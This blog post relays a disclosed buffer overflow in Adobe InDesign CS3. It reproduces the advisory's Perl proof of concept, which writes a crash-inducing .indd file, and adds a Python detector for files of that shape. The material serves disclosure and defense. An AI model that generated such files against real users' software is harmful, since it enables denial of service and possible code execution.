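A vulnerability has been discovered in InDesign CS3, one of Adobe's products.
I patched just today -_-;; It really hasn't been long since I patched!!
Adobe must be really busy, haha.
A PoC has already been published, so this one is dangerous too T_T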
- Exploit Code
#!/usr/bin/perl
#
# Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability
#
# Vendor: Adobe Systems Inc.
#
# Product Web Page: http://www.adobe.com
#
# Version tested: CS3 10.0
#
# Summary: Adobe® InDesign® CS3 software provides precise control over
# typography and built-in creative tools for designing, preflighting,
# and publishing documents for print, online, or to mobile devices. Include
# interactivity, animation, video, and sound in page layouts to fully engage
# readers.
#
# Desc: When parsing .indd files to the application, it crashes instantly
# overwriting memory registers. Depending on the offset, EBP, EDI, EDX and
# ESI gets overwritten. Potential vulnerability use is arbitrary code execution
# and denial of service.
#
#
# Tested on Microsoft Windows XP Professional SP3 (English)
#
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# Zero Science Lab - http://www.zeroscience.mk
#
# 16.09.2009
#
#
#
# Vendor status:
#
# [16.09.2009] Vulnerability discovered.
# [09.03.2010] Vulnerability reported to vendor with sent PoC files.
# [21.03.2010] Asked confirmation from the vendor.
# [21.03.2010] Vendor asked for PoC files due to communication errors.
# [22.03.2010] Re-sent PoC files to vendor.
# [04.04.2010] Vendor confirms vulnerability.
# [03.06.2010] Vendor informs that they discontinued support for CS3 since CS5 is out.
# [04.06.2010] Public advisory released.
#
#
# Zero Science Lab Advisory ID: ZSL-2010-4941
# Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4941.php
#
#
#
# Raw PoC code:
#
$header = "\x06\x06\xED\xF5\xD8\x1D\x46\xE5\xBD\x31\xEF\xE7\xFE\x74\xB7\x1D\x44\x4F\x43\x55\x4D\x45\x4E\x54\x01";
$fn = "teppei.indd";
$bof = "\x41" x 10000;
print "\n\n[*] Creating PoC file: $fn ...\r\n";
sleep(1);
open(indd, ">./$fn") || die "\n\aCannot open $fn : $!";
print indd "$header" . "$bof";
close (indd);
print "\n[*] PoC file successfully created!\r\n";
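
For triaging received .indd files, the following added example (not part of the original post or the advisory) flags files shaped like the PoC above: the header bytes from the script followed immediately by a long run of one repeated byte. The function names, the 1024-byte threshold and the 64 KiB read limit are assumptions.

```python
"""Triage .indd files for the malformed shape produced by the PoC above."""
import sys
from pathlib import Path

# Header bytes copied from the PoC on this page: 16-byte signature, "DOCUMENT", 0x01.
POC_HEADER = bytes.fromhex("0606edf5d81d46e5bd31efe7fe74b71d") + b"DOCUMENT\x01"
MIN_RUN = 1024          # assumption: filler length treated as suspicious
READ_LIMIT = 64 * 1024  # assumption: only the file prefix is inspected


def leading_run(body: bytes) -> int:
    """Length of the run of one repeated byte value at the start of body."""
    if not body:
        return 0
    return len(body) - len(body.lstrip(body[:1]))


def triage(data: bytes, min_run: int = MIN_RUN) -> tuple[str, int]:
    """Return (verdict, run) for the first bytes of a file."""
    if not data.startswith(POC_HEADER):
        return ("no-indd-header", 0)  # other format, or truncated header
    run = leading_run(data[len(POC_HEADER):])
    # The PoC has no document structure after the header, only filler.
    return ("suspicious" if run >= min_run else "ok", run)


def scan(root: str, min_run: int = MIN_RUN) -> list[tuple[str, int]]:
    """Return (path, run) for every *.indd under root that looks like the PoC."""
    hits = []
    for path in sorted(Path(root).rglob("*.indd")):
        if not path.is_file():
            continue
        with path.open("rb") as fh:
            verdict, run = triage(fh.read(READ_LIMIT), min_run)
        if verdict == "suspicious":
            hits.append((str(path), run))
    return hits


if __name__ == "__main__":
    # Constructed sample buffers, not real documents.
    print(triage(POC_HEADER + b"A" * 4096))
    print(triage(POC_HEADER + bytes(range(256)) * 16))
    for hit in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print("suspicious:", *hit)
```

A hit means the file is worth quarantining and inspecting before it is opened in InDesign CS3; an "ok" verdict only says the file does not match this one shape.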